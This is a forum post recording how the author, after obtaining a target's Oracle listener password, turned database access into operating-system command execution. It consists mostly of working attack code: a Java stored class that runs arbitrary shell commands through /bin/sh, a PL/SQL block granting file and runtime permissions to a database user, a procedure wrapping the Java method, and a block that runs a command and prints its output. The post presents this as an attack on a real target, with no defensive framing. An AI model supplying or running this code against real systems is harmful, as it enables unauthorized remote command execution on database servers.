Executing Linux commands from Oracle
Posted 2017-9-28 23:17:00 by the forum administrator
Original article: https://secvul.com/topics/793.html


One day I obtained the password for the target's port 1521 (Oracle listener), so I went straight to RCE; this is a record of the process.
1. After connecting with Navicat, create a Java source.
  import java.io.*;

  public class Host {
      public static void executeCommand(String command) {
          try {
              // Run the command through /bin/sh -c so shell syntax is honoured.
              String[] finalCommand = new String[3];
              finalCommand[0] = "/bin/sh";
              finalCommand[1] = "-c";
              finalCommand[2] = command;
              final Process pr = Runtime.getRuntime().exec(finalCommand);

              // Drain stdout in its own thread; System.out ends up in DBMS_OUTPUT.
              new Thread(new Runnable() {
                  public void run() {
                      BufferedReader br_in = null;
                      try {
                          br_in = new BufferedReader(new InputStreamReader(pr.getInputStream()));
                          String buff = null;
                          while ((buff = br_in.readLine()) != null) {
                              System.out.println("Process out :" + buff);
                              try { Thread.sleep(100); } catch (Exception e) {}
                          }
                      } catch (IOException ioe) {
                          System.out.println("Exception caught printing process output.");
                          ioe.printStackTrace();
                      } finally {
                          try { if (br_in != null) br_in.close(); } catch (Exception ex) {}
                      }
                  }
              }).start();

              // Same for stderr.
              new Thread(new Runnable() {
                  public void run() {
                      BufferedReader br_err = null;
                      try {
                          br_err = new BufferedReader(new InputStreamReader(pr.getErrorStream()));
                          String buff = null;
                          while ((buff = br_err.readLine()) != null) {
                              System.out.println("Process err :" + buff);
                              try { Thread.sleep(100); } catch (Exception e) {}
                          }
                      } catch (IOException ioe) {
                          System.out.println("Exception caught printing process error.");
                          ioe.printStackTrace();
                      } finally {
                          try { if (br_err != null) br_err.close(); } catch (Exception ex) {}
                      }
                  }
              }).start();

              // Wait only after both readers are running, so a full pipe buffer
              // cannot block the child process before its output is consumed.
              pr.waitFor();
          } catch (Exception ex) {
              System.out.println(ex.getLocalizedMessage());
          }
      }

      public static boolean isWindows() {
          return System.getProperty("os.name").toLowerCase().indexOf("windows") != -1;
      }
  }
2. Open a new query and grant the Java permissions to the database user

  DECLARE
  BEGIN
      -- The grantee must match the schema name as stored in the data dictionary (normally upper case).
      DBMS_JAVA.grant_permission('<database user>', 'java.io.FilePermission', '<<ALL FILES>>', 'read,write,execute,delete');
      DBMS_JAVA.grant_permission('<database user>', 'SYS:java.lang.RuntimePermission', 'writeFileDescriptor', '');
      DBMS_JAVA.grant_permission('<database user>', 'SYS:java.lang.RuntimePermission', 'readFileDescriptor', '');
  END;
  /
3. Create the mapping procedure (a PL/SQL call spec for the Java method)

  CREATE OR REPLACE PROCEDURE host_command (p_command IN VARCHAR2)
  AS LANGUAGE JAVA
  NAME '<class name>.executeCommand (java.lang.String)';
  /
4. Execute the command

  DECLARE
      l_output DBMS_OUTPUT.chararr;
      l_lines  INTEGER := 1000;
  BEGIN
      DBMS_OUTPUT.enable(1000000);
      DBMS_JAVA.set_output(1000000);

      host_command('/usr/bin/whoami'); -- the OS command to run (whoami here)

      -- Pull whatever the Java code wrote to System.out back out of the buffer and print it.
      DBMS_OUTPUT.get_lines(l_output, l_lines);
      FOR i IN 1 .. l_lines LOOP
          DBMS_OUTPUT.put_line(l_output(i));
      END LOOP;
  END;
  /
